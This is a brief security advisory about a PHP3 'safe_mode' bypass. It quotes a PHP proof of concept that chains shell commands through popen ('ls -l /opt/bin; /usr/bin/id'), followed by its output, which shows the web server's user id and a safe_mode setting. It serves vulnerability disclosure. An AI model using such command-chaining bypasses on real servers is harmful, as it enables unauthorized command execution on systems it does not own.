|
|
PHP3 'safe_mode' Failure Vulnerability
As per the message attached in the 'Credit' section. <?php $fp = popen("ls -l /opt/bin; /usr/bin/id", "r"); echo "$fp<br>\n"; while($line = fgets($fp, 1024)): printf("%s<br>\n", $line); endwhile; pclose($fp); phpinfo(); ?> which gave me the following output 1 total 53 -rwxr-xr-x 1 root root 52292 Jan 3 22:05 ls uid=30(wwwrun) gid=65534(nogroup) groups=65534(nogroup) and from the configuration values of phpinfo(): safe_mode 0 1 |
|
Privacy Statement |